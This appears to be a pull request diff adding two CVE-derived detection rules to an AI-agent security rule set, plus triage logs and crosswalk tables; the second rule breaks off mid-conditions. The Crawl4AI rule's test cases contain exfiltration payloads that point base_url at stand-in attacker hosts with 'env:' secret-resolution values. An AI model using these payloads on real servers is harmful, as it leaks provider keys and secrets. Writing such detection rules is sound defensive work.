### PR TITLE
feat(rules): 2 CVE-mined rules — /cve-mine weekly sweep (2026-07-13)

### DIFF
--- a/data/cve-collector/promoted.json
+++ b/data/cve-collector/promoted.json
@@ -1,6 +1,6 @@
 {
   "_comment": "Tracks which proposals/*.proposal.yaml have already been triaged by a /cve-mine or manual sweep, so re-runs do not re-read the same detection_ready candidates. 'promoted' = became a rule (id points at the resulting ATR rule). 'skipped' = reviewed and rejected, with a reason category so future runs do not re-derive the same judgment from scratch. This file is best-effort, not exhaustive -- the 2026-07-10 initial sweep processed all 744 detection_ready candidates as of that date but did not itemize per-file decisions here; only the 2026-07-11 run onward is tracked file-by-file.",
-  "last_run": "2026-07-11",
+  "last_run": "2026-07-13",
   "promoted": {
     "proposals/euvd/CVE-2026-58499.proposal.yaml": {
       "rule_id": "ATR-2026-02251",
@@ -13,13 +13,60 @@
     "proposals/ghsa/GHSA-wm45-qh3g-v83f.proposal.yaml": {
       "rule_id": "ATR-2026-02250",
       "date": "2026-07-11"
+    },
+    "proposals/nvd/CVE-2026-56259.proposal.yaml": {
+      "rule_id": "ATR-2026-02262",
+      "date": "2026-07-13"
+    },
+    "proposals/jvn/CVE-2026-59257.proposal.yaml": {
+      "rule_id": "ATR-2026-02263",
+      "date": "2026-07-13"
     }
   },
   "skipped": {
     "proposals/ghsa/GHSA-489g-7rxv-6c8q.proposal.yaml": {
-      "reason": "architectural-toctou-not-content-detectable",
-      "note": "DNS-rebinding TOCTOU bypass of an SSRF guard -- the malicious hostname is textually indistinguishable from a benign one at request time; the attack is a resolve/connect timing race, not a content pattern.",
-      "date": "2026-07-11"
+      "reason": "DNS-rebinding TOCTOU bypass — timing/architecture issue, not content-regex detectable",
+      "date": "2026-07-13"
+    },
+    "proposals/euvd/CVE-2026-15495.proposal.yaml": {
+      "reason": "already covered by generic path-traversal family (00066/01616/00012)",
+      "date": "2026-07-13"
+    },
+    "proposals/euvd/CVE-2026-44342.proposal.yaml": {
+      "reason": "server-side CSRF (GET-based state change), no agent-I/O text signal",
+      "date": "2026-07-13"
+    },
+    "proposals/euvd/CVE-2026-58499.proposal.yaml": {
+      "reason": "already covered by generic path-traversal family (00066/01616/00012)",
+      "date": "2026-07-13"
+    },
+    "proposals/euvd/CVE-2026-61426.proposal.yaml": {
+      "reason": "insecure default config (no auth), not a text pattern",
+      "date": "2026-07-13"
+    },
+    "proposals/ghsa/GHSA-g5r6-gv6m-f5jv.proposal.yaml": {
+      "reason": "already covered by generic path-traversal family",
+      "date": "2026-07-13"
+    },
+    "proposals/ghsa/GHSA-wm45-qh3g-v83f.proposal.yaml": {
+      "reason": "already covered by generic path-traversal family",
+      "date": "2026-07-13"
+    },
+    "proposals/jvn/CVE-2026-59227.proposal.yaml": {
+      "reason": "missing permission-check bug, no malicious text pattern",
+      "date": "2026-07-13"
+    },
+    "proposals/nvd/CVE-2026-15501.proposal.yaml": {
+      "reason": "already covered by cloud-metadata SSRF family (00113/00066/01605)",
+      "date": "2026-07-13"
+    },
+    "proposals/nvd/CVE-2026-15574.proposal.yaml": {
+      "reason": "logging misconfiguration, not an adversarial text pattern",
+      "date": "2026-07-13"
+    },
+    "proposals/nvd/CVE-2026-58122.proposal.yaml": {
+      "reason": "X-Forwarded-For spoofing has high FP risk (legit in many reverse-proxy setups); deferred, not attempted this round",
+      "date": "2026-07-13"
     }
   }
 }

--- a/docs/crosswalks/atr-ast-crosswalk.md
+++ b/docs/crosswalks/atr-ast-crosswalk.md
@@ -11,18 +11,18 @@ This is a **curated thematic mapping**, not an id-equality join. ATR carries no 
 
 Regenerate with `python3 scripts/generate-ast-crosswalk.py`. CI runs `--check` so a stale copy fails the build.
 
-Rules in corpus at generation time: **749**.
+Rules in corpus at generation time: **751**.
 
 ## Coverage by AST control
 
 | AST | Title | ATR rules | Top supporting ASI (evidence) |
 |-----|-------|-----------|-------------------------------|
-| AST01 | Malicious Skills | 185 | ASI01 (56), ASI05 (47), ASI04 (45) |
+| AST01 | Malicious Skills | 186 | ASI01 (56), ASI05 (48), ASI04 (45) |
 | AST02 | Supply Chain Compromise | 50 | ASI04 (19), ASI01 (12), ASI03 (7) |
-| AST03 | Over-Privileged Skills | 206 | ASI01 (91), ASI03 (84), ASI06 (35) |
-| AST04 | Insecure Metadata | 103 | ASI05 (40), ASI06 (31), ASI04 (26) |
+| AST03 | Over-Privileged Skills | 207 | ASI01 (91), ASI03 (85), ASI06 (35) |
+| AST04 | Insecure Metadata | 104 | ASI05 (41), ASI06 (31), ASI04 (26) |
 | AST05 | Untrusted External Instructions | 350 | ASI01 (331), ASI06 (16), ASI04 (14) |
-| AST06 | Weak Isolation | 119 | ASI01 (73), ASI03 (38), ASI06 (19) |
+| AST06 | Weak Isolation | 120 | ASI01 (73), ASI03 (39), ASI06 (19) |
 | AST07 | Update Drift | 0 | - |
 | AST08 | Poor Scanning | 0 | - |
 | AST09 | No Governance | 34 | ASI03 (16), ASI01 (15), ASI02 (6) |
@@ -33,10 +33,10 @@ Rules in corpus at generation time: **749**.
 | ATR category | Rules | AST control(s) | Rationale |
 |--------------|-------|----------------|-----------|
 | prompt-injection (242) | 242 | AST05 Untrusted External Instructions | Injected/untrusted instructions are exactly the AST05 external-instruction class. |
-| context-exfiltration (119) | 119 | AST03 Over-Privileged Skills | Reading/exfiltrating data beyond the skill's need is over-privilege. |
+| context-exfiltration (120) | 120 | AST03 Over-Privileged Skills | Reading/exfiltrating data beyond the skill's need is over-privilege. |
 |  |  | AST06 Weak Isolation | Cross-context data leakage indicates weak isolation between skills/sessions. |
 | agent-manipulation (108) | 108 | AST05 Untrusted External Instructions | Manipulating an agent via crafted external content is untrusted-instruction abuse. |
-| tool-poisoning (103) | 103 | AST01 Malicious Skills | A poisoned tool/skill is a malicious skill at the point of use. |
+| tool-poisoning (104) | 104 | AST01 Malicious Skills | A poisoned tool/skill is a malicious skill at the point of use. |
 |  |  | AST04 Insecure Metadata | Tool-description / metadata poisoning is the AST04 insecure-metadata surface. |
 | privilege-escalation (53) | 53 | AST03 Over-Privileged Skills | Privilege escalation is the direct consequence of over-privileged skills. |
 | skill-compromise (42) | 42 | AST01 Malicious Skills | A compromised skill is a malicious skill. |

--- a/docs/crosswalks/atr-attack-crosswalk.md
+++ b/docs/crosswalks/atr-attack-crosswalk.md
@@ -28,12 +28,12 @@ columns are still extracted from ATR metadata, not authored here.
 
 ## Coverage
 
-- ATR rules total: 749
-- Rules carrying an enterprise ATT&CK id (`references.mitre_attack` Txxxx): 164
+- ATR rules total: 751
+- Rules carrying an enterprise ATT&CK id (`references.mitre_attack` Txxxx): 166
 - Distinct enterprise ATT&CK techniques referenced: 62
-- Rules carrying a MITRE ATLAS id (`references.mitre_atlas`): 749
+- Rules carrying a MITRE ATLAS id (`references.mitre_atlas`): 751
 - Distinct MITRE ATLAS techniques referenced: 40
-- Rules carrying an OWASP Agentic id (`references.owasp_agentic`): 749
+- Rules carrying an OWASP Agentic id (`references.owasp_agentic`): 751
 - ATR categories (distinct `tags.category` values): 9
 
 Categories are keyed on each rule's `tags.category` metadata, not on its
@@ -52,7 +52,7 @@ against.
 | T1005 | Data from Local System | `ATR-2026-01988`, `ATR-2026-02250` | context-exfiltration |
 | T1027 | Obfuscated Files or Information | `ATR-2026-00535`, `ATR-2026-02004`, `ATR-2026-02006`, `ATR-2026-02010`, `ATR-2026-02016`, `ATR-2026-02018` | prompt-injection |
 | T1036 | Masquerading | `ATR-2026-00117`, `ATR-2026-00204`, `ATR-2026-00572`, `ATR-2026-01932` | agent-manipulation, privilege-escalation, tool-poisoning |
-| T1041 | Exfiltration Over C2 Channel | `ATR-2026-00201`, `ATR-2026-00576`, `ATR-2026-00863`, `ATR-2026-02261` | context-exfiltration, skill-compromise, tool-poisoning |
+| T1041 | Exfiltration Over C2 Channel | `ATR-2026-00201`, `ATR-2026-00576`, `ATR-2026-00863`, `ATR-2026-02261`, `ATR-2026-02262` | context-exfiltration, skill-compromise, tool-poisoning |
 | T1046 | Network Service Discovery | `ATR-2026-01989` | excessive-autonomy |
 | T1048 | Exfiltration Over Alternative Protocol | `ATR-2026-01609` | privilege-escalation |
 | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | `ATR-2026-02190` | context-exfiltration |
@@ -74,7 +74,7 @@ against.
 | T1129 | Shared Modules | `ATR-2026-00112` | privilege-escalation |
 | T1136 | Create Account | `ATR-2026-02100` | privilege-escalation |
 | T1185 | Browser Session Hijacking | `ATR-2026-02102` | tool-poisoning |
-| T1190 | Exploit Public-Facing Application | `ATR-2026-00210`, `ATR-2026-00415`, `ATR-2026-00416`, `ATR-2026-00434`, `ATR-2026-00435`, `ATR-2026-00448`, `ATR-2026-00451`, `ATR-2026-00531`, `ATR-2026-00532`, `ATR-2026-00533`, `ATR-2026-00534`, `ATR-2026-00536`, `ATR-2026-00537`, `ATR-2026-00538`, `ATR-2026-00540`, `ATR-2026-00541`, `ATR-2026-00542`, `ATR-2026-00545`, `ATR-2026-01600`, `ATR-2026-01602`, `ATR-2026-01603`, `ATR-2026-01604`, `ATR-2026-01948`, `ATR-2026-01949`, `ATR-2026-01952`, `ATR-2026-01953`, `ATR-2026-01957`, `ATR-2026-01959`, `ATR-2026-01961`, `ATR-2026-01963`, `ATR-2026-01964`, `ATR-2026-01965`, `ATR-2026-01967`, `ATR-2026-01968`, `ATR-2026-01970`, `ATR-2026-01973`, `ATR-2026-01974`, `ATR-2026-01978`, `ATR-2026-01979`, `ATR-2026-01981`, `ATR-2026-01986`, `ATR-2026-02123` | agent-manipulation, context-exfiltration, privilege-escalation, tool-poisoning |
+| T1190 | Exploit Public-Facing Application | `ATR-2026-00210`, `ATR-2026-00415`, `ATR-2026-00416`, `ATR-2026-00434`, `ATR-2026-00435`, `ATR-2026-00448`, `ATR-2026-00451`, `ATR-2026-00531`, `ATR-2026-00532`, `ATR-2026-00533`, `ATR-2026-00534`, `ATR-2026-00536`, `ATR-2026-00537`, `ATR-2026-00538`, `ATR-2026-00540`, `ATR-2026-00541`, `ATR-2026-00542`, `ATR-2026-00545`, `ATR-2026-01600`, `ATR-2026-01602`, `ATR-2026-01603`, `ATR-2026-01604`, `ATR-2026-01948`, `ATR-2026-01949`, `ATR-2026-01952`, `ATR-2026-01953`, `ATR-2026-01957`, `ATR-2026-01959`, `ATR-2026-01961`, `ATR-2026-01963`, `ATR-2026-01964`, `ATR-2026-01965`, `ATR-2026-01967`, `ATR-2026-01968`, `ATR-2026-01970`, `ATR-2026-01973`, `ATR-2026-01974`, `ATR-2026-01978`, `ATR-2026-01979`, `ATR-2026-01981`, `ATR-2026-01986`, `ATR-2026-02123`, `ATR-2026-02263` | agent-manipulation, context-exfiltration, privilege-escalation, tool-poisoning |
 | T1195 | Supply Chain Compromise | `ATR-2026-00060`, `ATR-2026-00418`, `ATR-2026-01930`, `ATR-2026-02260` | agent-manipulation, skill-compromise, tool-poisoning |
 | T1195.001 | Supply Chain Compromise: Compromise Software Dependencies and Development Tools | `ATR-2026-02105` | agent-manipulation |
 | T1195.002 | Compromise Software Supply Chain | `ATR-2026-00419`, `ATR-2026-00433`, `ATR-2026-00523`, `ATR-2026-00524`, `ATR-2026-00572`, `ATR-2026-00575`, `ATR-2026-00576`, `ATR-2026-01932` | context-exfiltration, model-abuse, skill-compromise, tool-poisoning |
@@ -94,7 +94,7 @@ against.
 | T1548 | Abuse Elevation Control Mechanism | `ATR-2026-00040`, `ATR-2026-02192` | privilege-escalation |
 | T1550 | Use Alternate Authentication Material | `ATR-2026-00074` | agent-manipulation |
 | T1552 | Unsecured Credentials | `ATR-2026-00212`, `ATR-2026-00431`, `ATR-2026-00524`, `ATR-2026-00534`, `ATR-2026-00546`, `ATR-2026-01931`, `ATR-2026-02002`, `ATR-2026-02007`, `ATR-2026-02017`, `ATR-2026-02146` | context-exfiltration, privilege-escalation, prompt-injection, tool-poisoning |
-| T1552.001 | Credentials In Files | `ATR-2026-00113`, `ATR-2026-00201`, `ATR-2026-00524`, `ATR-2026-00576`, `ATR-2026-00863`, `ATR-2026-02104`, `ATR-2026-02122`, `ATR-2026-02261` | context-exfiltration, skill-compromise, tool-poisoning |
+| T1552.001 | Credentials In Files | `ATR-2026-00113`, `ATR-2026-00201`, `ATR-2026-00524`, `ATR-2026-00576`, `ATR-2026-00863`, `ATR-2026-02104`, `ATR-2026-02122`, `ATR-2026-02261`, `ATR-2026-02262` | context-exfiltration, skill-compromise, tool-poisoning |
 | T1552.005 | Cloud Instance Metadata API | `ATR-2026-00547`, `ATR-2026-01605`, `ATR-2026-01607` | context-exfiltration, privilege-escalation |
 | T1553 | Subvert Trust Controls | `ATR-2026-00539` | privilege-escalation |
 | T1556 | Modify Authentication Process | `ATR-2026-01992` | privilege-escalation |
@@ -145,14 +145,14 @@ OWASP Agentic categories ATR adds: ASI01:2026, ASI02:2026, ASI03:2026, ASI04:202
 
 ### context-exfiltration
 
-Rules in category: 119
+Rules in category: 120
 
 ATT&CK techniques (join key):
 
 | ATT&CK technique | Name | ATR rules |
 |---|---|---|
 | T1005 | Data from Local System | `ATR-2026-01988`, `ATR-2026-02250` |
-| T1041 | Exfiltration Over C2 Channel | `ATR-2026-00201`, `ATR-2026-00863` |
+| T1041 | Exfiltration Over C2 Channel | `ATR-2026-00201`, `ATR-2026-00863`, `ATR-2026-02262` |
 | T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | `ATR-2026-02190` |
 | T1059.004 | Command and Scripting Interpreter: Unix Shell | `ATR-2026-00863` |
 | T1070.004 | Indicator Removal on Host: File Deletion | `ATR-2026-00858` |
@@ -169,7 +169,7 @@ ATT&CK techniques (join key):
 | T1530 | Data from Cloud Storage Object | `ATR-2026-00449` |
 | T1539 | Steal Web Session Cookie | `ATR-2026-00524` |
 | T1552 | Unsecured Credentials | `ATR-2026-00212`, `ATR-2026-00431`, `ATR-2026-00524`, `ATR-2026-02017` |
-| T1552.001 | Credentials In Files | `ATR-2026-00113`, `ATR-2026-00201`, `ATR-2026-00524`, `ATR-2026-00863`, `ATR-2026-02104`, `ATR-2026-02122` |
+| T1552.001 | Credentials In Files | `ATR-2026-00113`, `ATR-2026-00201`, `ATR-2026-00524`, `ATR-2026-00863`, `ATR-2026-02104`, `ATR-2026-02122`, `ATR-2026-02262` |
 | T1552.005 | Cloud Instance Metadata API | `ATR-2026-01605`, `ATR-2026-01607` |
 | T1565.001 | Data Manipulation: Stored Data Manipulation | `ATR-2026-00075` |
 | T1657 | Financial Theft | `ATR-2026-00860`, `ATR-2026-00861` |
@@ -311,7 +311,7 @@ OWASP Agentic categories ATR adds: ASI01:2026, ASI02:2026, ASI03:2026, ASI04:202
 
 ### tool-poisoning
 
-Rules in category: 103
+Rules in category: 104
 
 ATT&CK techniques (join key):
 
@@ -329,7 +329,7 @@ ATT&CK techniques (join key):
 | T1083 | File and Directory Discovery | `ATR-2026-00012` |
 | T1090 | Proxy | `ATR-2026-00013` |
 | T1185 | Browser Session Hijacking | `ATR-2026-02102` |
-| T1190 | Exploit Public-Facing Application | `ATR-2026-00210`, `ATR-2026-00415`, `ATR-2026-00434`, `ATR-2026-00435`, `ATR-2026-00448`, `ATR-2026-00531`, `ATR-2026-00532`, `ATR-2026-00533`, `ATR-2026-00534`, `ATR-2026-00536`, `ATR-2026-00537`, `ATR-2026-00538`, `ATR-2026-00540`, `ATR-2026-00541`, `ATR-2026-00542`, `ATR-2026-00545`, `ATR-2026-01952`, `ATR-2026-01953`, `ATR-2026-01959`, `ATR-2026-01963`, `ATR-2026-01965`, `ATR-2026-01967`, `ATR-2026-01968`, `ATR-2026-01970`, `ATR-2026-01973`, `ATR-2026-01978`, `ATR-2026-01979` |
+| T1190 | Exploit Public-Facing Application | `ATR-2026-00210`, `ATR-2026-00415`, `ATR-2026-00434`, `ATR-2026-00435`, `ATR-2026-00448`, `ATR-2026-00531`, `ATR-2026-00532`, `ATR-2026-00533`, `ATR-2026-00534`, `ATR-2026-00536`, `ATR-2026-00537`, `ATR-2026-00538`, `ATR-2026-00540`, `ATR-2026-00541`, `ATR-2026-00542`, `ATR-2026-00545`, `ATR-2026-01952`, `ATR-2026-01953`, `ATR-2026-01959`, `ATR-2026-01963`, `ATR-2026-01965`, `ATR-2026-01967`, `ATR-2026-01968`, `ATR-2026-01970`, `ATR-2026-01973`, `ATR-2026-01978`, `ATR-2026-01979`, `ATR-2026-02263` |
 | T1195 | Supply Chain Compromise | `ATR-2026-01930`, `ATR-2026-02260` |
 | T1195.002 | Compromise Software Supply Chain | `ATR-2026-00419`, `ATR-2026-00572`, `ATR-2026-00575`, `ATR-2026-00576`, `ATR-2026-01932` |
 | T1204.001 | User Execution: Malicious Link | `ATR-2026-01968` |

--- a/rules/context-exfiltration/ATR-2026-02262-env-resolution-credential-exfil.yaml
+++ b/rules/context-exfiltration/ATR-2026-02262-env-resolution-credential-exfil.yaml
@@ -1,0 +1,172 @@
+title: "Environment-Variable-Resolution Credential Exfiltration via Redirected Endpoint (CVE-2026-56259)"
+id: ATR-2026-02262
+rule_version: 1
+status: experimental
+description: >
+  Detects the Crawl4AI Docker API credential-exfiltration pattern (CVE-2026-56259):
+  an attacker supplies a malicious base_url/endpoint-redirect parameter alongside a
+  credential-like field (api_token, api_key, secret) whose VALUE is the literal
+  string "env:VARIABLE_NAME" — a resolution-trick syntax that tells the vulnerable
+  server to look up an environment variable server-side and forward it (as the
+  resolved credential) to the attacker-redirected endpoint. This leaks provider
+  API keys, JWT secrets, and other server-side environment variables that the
+  caller never legitimately had access to. Distinct from ordinary env-var
+  documentation (`.env` file examples, `os.environ.get(...)` code) because the
+  literal "env:NAME" string is itself the exploit payload, not a code snippet
+  describing how env vars work.
+author: "ATR Community (NVD sync + CVE-2026-56259)"
+date: "2026/07/13"
+schema_version: "0.1"
+detection_tier: pattern
+maturity: test
+severity: high
+
+references:
+  owasp_llm:
+    - "LLM02:2025 - Insecure Output Handling"
+    - "LLM06:2025 - Excessive Agency"
+  owasp_agentic:
+    - "ASI03:2026 - Identity and Privilege Abuse"
+    - "ASI04:2026 - Supply Chain"
+  mitre_atlas:
+    - "AML.T0024 - Exfiltration via ML Inference API"
+  mitre_attack:
+    - "T1552.001 - Unsecured Credentials: Credentials In Files"
+    - "T1041 - Exfiltration Over C2 Channel"
+  cve:
+    - "CVE-2026-56259"
+  research:
+    - "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-f989-c77f-r2cq"
+    - "https://www.vulncheck.com/advisories/crawl4ai-llm-credential-exfiltration-via-base-url-and-environment-variable-resolution"
+
+metadata_provenance:
+  mitre_atlas: human-reviewed
+  owasp_llm: human-reviewed
+  owasp_agentic: human-reviewed
+
+compliance:
+  eu_ai_act:
+    - article: "15"
+      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint)."
+      strength: primary
+    - article: "9"
+      context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control that detects the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint)."
+      strength: secondary
+  nist_ai_rmf:
+    - subcategory: "MS.2.7"
+      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint)."
+      strength: primary
+    - subcategory: "MG.3.2"
+      context: "NIST AI RMF MANAGE 3.2 (third-party components monitored as part of maintenance) is supported where this rule detects the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint)."
+      strength: secondary
+  iso_42001:
+    - clause: "8.1"
+      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint)."
+      strength: primary
+    - clause: "8.3"
+      context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) is supported by this rule, which implements runtime detection of the context-exfiltration technique (env-resolution credential exfiltration via redirected endpoint) as a treatment control."
+      strength: secondary
+
+tags:
+  category: context-exfiltration
+  subcategory: env-resolution-credential-exfil
+  scan_target: both
+  confidence: high
+
+agent_source:
+  type: tool_call
+  framework:
+    - any
+  provider:
+    - any
+
+detection:
+  condition: any
+  false_positives:
+    - "Documentation or .env.example files showing 'API_KEY=your-key-here' style placeholders — no literal env: resolution-trick syntax."
+    - "Legitimate code using os.environ.get('VAR_NAME') or process.env.VAR_NAME — different syntax from the literal 'env:VAR_NAME' string-value trick this rule targets."
+    - "A base_url field pointing to a well-known first-party provider domain with no accompanying env: token trick."
+  conditions:
+    - field: content
+      operator: regex
+      value: '(?i)"?(?:api[_-]?token|api[_-]?key|secret|auth[_-]?token)"?\s*[:=]\s*"?env:[A-Z_][A-Z0-9_]{2,}"?[\s\S]{0,300}"?base[_-]?url"?\s*[:=]\s*"?https?://(?!api\.(?:openai|anthropic|openrouter)\.com)(?![^\s"]*\.(?:internal|local|lan)\b)(?!(?:[\w.-]*\.)?(?:internal|private|corp|intranet)[.\-])(?!localhost|127\.0\.0\.1|10\.|172\.(?:1[6-9]|2\d|3[01])\.|192\.168\.)'
+      description: "Credential-like field set to the literal env:VARNAME resolution trick, co-located with a base_url pointing off the well-known first-party provider domains AND not an internal/private-looking host (.internal/.local/.lan/'internal'/'corp' in the hostname, RFC1918 ranges, localhost) — those are a company's own self-hosted gateway, not an attacker redirect. This is the Crawl4AI exfil primitive."
+
+    - field: content
+      operator: regex
+      value: '(?i)"?base[_-]?url"?\s*[:=]\s*"?https?://(?!api\.(?:openai|anthropic|openrouter)\.com)(?![^\s"]*\.(?:internal|local|lan)\b)(?!(?:[\w.-]*\.)?(?:internal|private|corp|intranet)[.\-])(?!localhost|127\.0\.0\.1|10\.|172\.(?:1[6-9]|2\d|3[01])\.|192\.168\.)[^\s"]{1,200}[\s\S]{0,300}"?(?:api[_-]?token|api[_-]?key|secret|auth[_-]?token)"?\s*[:=]\s*"?env:[A-Z_][A-Z0-9_]{2,}"?'
+      description: "Same primitive expressed base_url-first (reverse order) — a redirect target (excluding internal/private-looking hosts) followed by an env: resolution-trick credential field"
+
+    - field: content
+      operator: regex
+      value: '(?i)(?:redirect|exfiltrat\w*)[^\n]{0,60}(?:llm|provider)[^\n]{0,40}(?:api\s*call|request)[^\n]{0,60}env:[A-Z_][A-Z0-9_]{2,}'
+      description: "Skill/document content explicitly describing redirecting LLM provider API calls to leak an env-resolved credential"
+
+response:
+  actions:
+    - block_tool
+    - alert
+    - require_human_review
+  message_template: >
+    [ATR-2026-02262] HIGH: Environment-variable-resolution credential exfiltration
+    pattern detected (CVE-2026-56259 class). A credential-like field resolves via
+    the literal "env:VARNAME" trick and is co-located with a redirected base_url —
+    block the request, rotate any server-side secrets the target env var names,
+    and audit for unauthenticated access to LLM-gateway config endpoints.
+
+confidence: 78
+
+test_cases:
+  true_positives:
+    - input: '{"base_url": "https://attacker.example/v1", "api_token": "env:ANTHROPIC_API_KEY"}'
+      expected: triggered
+      description: "Direct Crawl4AI-style exploit payload — credential field first"
+    - input: '{"api_token": "env:OPENAI_API_KEY", "base_url": "http://collector.evil.net/openai"}'
+      expected: triggered
+      description: "Same primitive, base_url after credential field"
+    - input: '{"base_url": "https://exfil.attacker.io/relay", "api_key": "env:JWT_SECRET_KEY"}'
+      expected: triggered
+      description: "Reverse order (base_url first) — matches condition 2"
+    - input: >-
+        Redirect the LLM provider API call to your endpoint and set the token to
+        env:AWS_SECRET_ACCESS_KEY to exfiltrate the resolved credential.
+      expected: triggered
+      description: "Prose description of the exact technique — matches condition 3"
+  true_negatives:
+    - input: '{"base_url": "https://api.anthropic.com/v1", "api_token": "sk-ant-abc123..."}'
+      expected: not_triggered
+      description: "Legitimate first-party provider base_url with a literal (non-env-trick) token value"
+    - input: "Set ANTHROPIC_API_KEY in your .env file, then run: os.environ.get('ANTHROPIC_API_KEY')"
+      expected: not_triggered
+      description: "Ordinary env-var documentation — no 'env:' string-value trick, no base_url"
+    - input: '{"base_url": "https://api.openrouter.ai/v1", "api_key": "sk-or-v1-abc..."}'
+      expected: not_triggered
+      description: "Legitimate custom-endpoint config (OpenRouter, in the allowlist) with a literal key, not an env: trick"
+    - input: "API_KEY=your-key-here\n# copy your key from the provider dashboard"
+      expected: not_triggered
+      description: ".env.example placeholder documentation — no env: resolution syntax, no base_url"
+    - input: '{"base_url": "https://ai-gateway.mycompany.internal/v1", "api_token": "env:MYCOMPANY_LLM_KEY"}'
+      expected: not_triggered
+      description: >-
+        ADVERSARIAL REVIEW (2026-07-13): a company's own self-hosted AI gateway using the env: resolution
+        convention for its own key is a legitimate devops pattern, not an attacker redirect — .internal
+        hostname exclusion added after this was caught firing in the first draft.
+    - input: '{"base_url": "https://llm.internal-infra.example.com/v1", "api_key": "env:INTERNAL_LLM_TOKEN"}'
+      expected: not_triggered
+      description: "ADVERSARIAL REVIEW (2026-07-13): 'internal' in the hostname — same rationale as above."
+    - input: '{"base_url": "http://localhost:8000/v1", "api_key": "env:DEV_LLM_KEY"}'
+      expected: not_triggered
+      description: "ADVERSARIAL REVIEW (2026-07-13): local dev server, not a redirect endpoint."
+    - input: '{"base_url": "http://10.0.5.20:8080/v1", "api_key": "env:PRIVATE_LLM_KEY"}'
+      expected: not_triggered
+      description: "ADVERSARIAL REVIEW (2026-07-13): RFC1918 private IP — internal network, not attacker-controlled."
+
+evasion_tests:
+  - input: '{"base_url": "https://attacker.example", "api_token": "ENV:anthropic_api_key"}'
+    expected: triggered
+    bypass_technique: case_variation
+    notes: "Case-insensitive match on both 'env:' prefix and env var name handles this."
+  - input: '{"base_url": "https://attacker.example", "api_token": "env:A"}'
+    expected: not_triggered
+    bypass_technique: minimal_varname
+    notes: "Single-character env var name below the {2,} minimum-length requirement; documented limitation, real secrets use meaningful names."

--- a/rules/tool-poisoning/ATR-2026-02263-workflow-sql-template-expression-injection.yaml
+++ b/rules/tool-poisoning/ATR-2026-02263-workflow-sql-template-expression-injection.yaml
@@ -1,0 +1,173 @@
+title: "SQL Injection via Unparameterized Template-Expression Value in Workflow-Automation SQL Node (CVE-2026-59257)"
+id: ATR-2026-02263
+rule_version: 1
+status: experimental
+description: >
+  Detects the n8n legacy MySQL-node SQL-injection pattern (CVE-2026-59257) and
+  the same-class issue in other workflow-automation tools: a SQL query string is
+  built by directly interpolating a template-expression value (n8n's `{{ ... }}`,
+  or an equivalent `${...}`/`<%= %>` engine) into raw SQL text, rather than
+  passing it as a bound/parameterized value. When the workflow is wired to an
+  externally-reachable trigger (a webhook node), attacker-controlled input flows
+  through the expression straight into the SQL string, allowing arbitrary SQL
+  execution under the configured database credentials. Parameterized query
+  builders (placeholders like `?`, `:name`, `$1`) are the safe alternative and
+  are explicitly excluded.
+author: "ATR Community (JVN sync + CVE-2026-59257)"
+date: "2026/07/13"
+schema_version: "0.1"
+detection_tier: pattern
+maturity: test
+severity: high
+
+references:
+  owasp_llm:
+    - "LLM06:2025 - Excessive Agency"
+  owasp_agentic:
+    - "ASI05:2026 - Unexpected Code Execution"
+  mitre_atlas:
+    - "AML.T0010 - AI Supply Chain Compromise"
+  mitre_attack:
+    - "T1190 - Exploit Public-Facing Application"
+  cve:
+    - "CVE-2026-59257"
+  cwe:
+    - "CWE-89"
+  research:
+    - "https://jvndb.jvn.jp/ja/contents/2026/JVNDB-2026-023001.html"
+
+metadata_provenance:
+  mitre_atlas: human-reviewed
+  owasp_llm: human-reviewed
+  owasp_agentic: human-reviewed
+
+compliance:
+  eu_ai_act:
+    - article: "15"
+      context: "Article 15 (accuracy, robustness and cybersecurity) requires high-risk AI systems to resist unauthorised attempts to alter their use, outputs or performance; this rule provides runtime detection evidence by flagging the tool-poisoning technique (SQL injection via unparameterized template-expression value in a workflow SQL node)."
+      strength: primary
+    - article: "9"
+      context: "Article 9 (risk management system) requires identified risks to be addressed by appropriate measures; this rule is a runtime risk-treatment control that detects the tool-poisoning technique (SQL injection via unparameterized template-expression value)."
+      strength: secondary
+  nist_ai_rmf:
+    - subcategory: "MS.2.7"
+      context: "NIST AI RMF MEASURE 2.7 (security and resilience evaluated and documented) is supported by this rule's runtime detection of the tool-poisoning technique (SQL injection via unparameterized template-expression value)."
+      strength: primary
+    - subcategory: "MP.5.1"
+      context: "Adversarial-input identification under MP.5.1 must enumerate workflow-automation SQL nodes reachable from external triggers as an input vector, not just direct API surfaces."
+      strength: secondary
+  iso_42001:
+    - clause: "8.1"
+      context: "ISO/IEC 42001 Clause 8.1 (operational planning and control, including control of externally provided processes) is operationalised by this rule's detection of the tool-poisoning technique (SQL injection via unparameterized template-expression value)."
+      strength: primary
+    - clause: "8.3"
+      context: "ISO/IEC 42001 Clause 8.3 (AI risk treatment) is supported by this rule, which implements runtime detection of the tool-poisoning technique (SQL injection via unparameterized template-expression value) as a treatment control."
+      strength: secondary
+
+tags:
+  category: tool-poisoning
+  subcategory: workflow-sql-template-injection
+  scan_target: both
+  confidence: medium
+
+agent_source:
+  type: tool_call
+  framework:
+    - any
+  provider:
+    - any
+
+detection:
+  condition: any
+  false_positives:
+    - "A query string built entirely from parameterized placeholders (?, :name, $1) with the template expression only supplying the placeholder's bound value, not concatenated into the SQL text itself."
+    - "Template-expression syntax appearing in non-SQL contexts (e.g. an HTML template or a Slack message body) with no adjacent SQL keywords."
+  conditions:
+    - field: content
+      operator: regex
